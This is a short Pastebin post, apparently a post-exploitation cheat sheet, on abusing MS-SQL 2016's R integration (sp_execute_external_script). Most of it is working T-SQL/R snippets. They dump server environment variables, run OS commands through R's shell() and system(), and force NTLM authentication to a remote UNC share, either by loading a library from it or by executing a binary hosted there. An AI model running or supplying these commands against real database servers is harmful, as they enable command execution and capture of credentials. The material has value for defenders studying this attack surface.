API tools faq
paste
Advertisement
Guest User

MS-SQL with R

a guest
Jun 7th, 2017
4,432
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.05 KB | None | 0 0
raw download clone embed print report
  1. Starting with MS-SQL 2016 MS has allowed for the inclusion of the Microsoft R Server services, permitting the execution of R scripts in the MS-SQL environment. In order for this funcitonality to be enabled, the R services for SQL server component must be installed, the server must be reconfigured to permit sp_exectue_external_script, and a user must be granted the 'EXECUTE ANY EXTERNAL SCRIPT' permission; yes, all of this is becoming increasingly more common.
  2.  
  3. Once these conditions are in place, SQL users will have R capabilities in their queries through the use of sp_execute_external_script().
  4.  
  5. This can be 'fun'..
  6.  
  7. Sample R query in MS-SQL (from MSDN):
  8.  
  9. EXEC sp_execute_external_script
  10. @language=N'R',
  11. @script=N'OutputDataSet <- InputDataSet',
  12. @input_data_1=N'SELECT 1 AS hello'
  13. WITH RESULT SETS (([hello] int not null));
  14. GO
  15.  
  16. Get the current R environment variables:
  17.  
  18. EXEC sp_execute_external_script
  19. @language=N'R',
  20. @script=N'OutputDataSet <- data.frame(c(EnvVals=Sys.getenv()))'
  21. WITH RESULT SETS (([EnvVals] TEXT));
  22. GO
  23.  
  24. Forced remote authentication via library inclusion:
  25.  
  26. EXEC sp_execute_external_script
  27. @language=N'R',
  28. @script=N'.libPaths("\\\\testhost\\foo\\bar");library("0mgh4x")'
  29. WITH RESULT SETS (([FileLines] TEXT));
  30. GO
  31.  
  32. Local command execution through R shell():
  33.  
  34. EXEC sp_execute_external_script
  35. @language=N'R',
  36. @script=N'OutputDataSet <- data.frame(shell("dir",intern=T))'
  37. WITH RESULT SETS (([cmd_out] text));
  38. GO
  39.  
  40. Local command execution through R system():
  41.  
  42. EXEC sp_execute_external_script
  43. @language=N'R',
  44. @script=N'OutputDataSet <- data.frame(system("cmd.exe /c dir",intern=T))'
  45. WITH RESULT SETS (([cmd_out] text));
  46. GO
  47.  
  48. Forced remote authentication via UNC execution:
  49.  
  50. EXEC sp_execute_external_script
  51. @language=N'R',
  52. @script=N'OutputDataSet <- data.frame(system("cmd.exe /c \\\\testhost\\no\\bin.exe",intern=T))'
  53. WITH RESULT SETS (([cmd_out] text));
  54. GO
  55.  
  56. As with most things in the realm of post-exploitation, if someone can do this, you've got bigger problems to worry about.
  57.  
  58. -whitey
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!